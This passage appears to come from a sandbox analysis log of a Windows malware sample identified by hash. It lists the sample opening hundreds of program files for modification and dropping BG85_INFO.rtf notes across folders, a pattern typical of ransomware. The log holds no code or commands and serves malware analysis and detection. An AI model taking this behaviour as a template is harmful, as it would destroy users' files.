Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActions.exsd c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\currency.data c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Mail\wabmig.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5EDT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Vilnius c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\America\Kentucky\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-7 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core_0.10.100.v20140424-2042.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Rome c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STP c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\net.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\core.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Manaus c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\removed-files c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Rangoon c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.zh_CN_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bahia c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Riga c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.SF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\THANKS.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-9 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\view.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.security c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-5 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.zh_CN_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\San_Luis c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh89 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sl.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yakutsk c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\Welcome.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Mazatlan c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql70.xsl c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\Welcome.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Galapagos c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\epl-v10.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata_2.2.0.v20131211-1531.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-io-ui.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jmx.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_zh_TW.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Qatar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\README.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyrun.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench_1.1.0.v20140512-1820.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_TW.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-util-enumerations.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Lagos c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_it.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net_1.2.200.v20120807-0927.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tarawa c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\LoginForm.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javaws.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.ja_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+7 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-mx.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Melbourne c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.util_1.7.0.v201011041433.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\MST7MDT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.war c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.zh_CN_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javap.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\DVA.api c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\ResourceInternal.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmc.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Swift_Current c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\COPYRIGHT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\MANIFEST.MF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.common_3.6.200.v20130402-1505.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Prague c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Kentucky\Monticello c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\es-419.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\Words.pdf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Samara c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ashgabat c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-ui.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\La_Paz c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dhaka c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Makassar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kwajalein c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Curacao c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.zh_CN_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jvm.hprof.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\bin\klist.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Blanc-Sablon c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_ko.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\security\blacklist c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\docs.crx c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\desktop.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.zh_CN_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console_1.0.300.v20131113-1212.jar 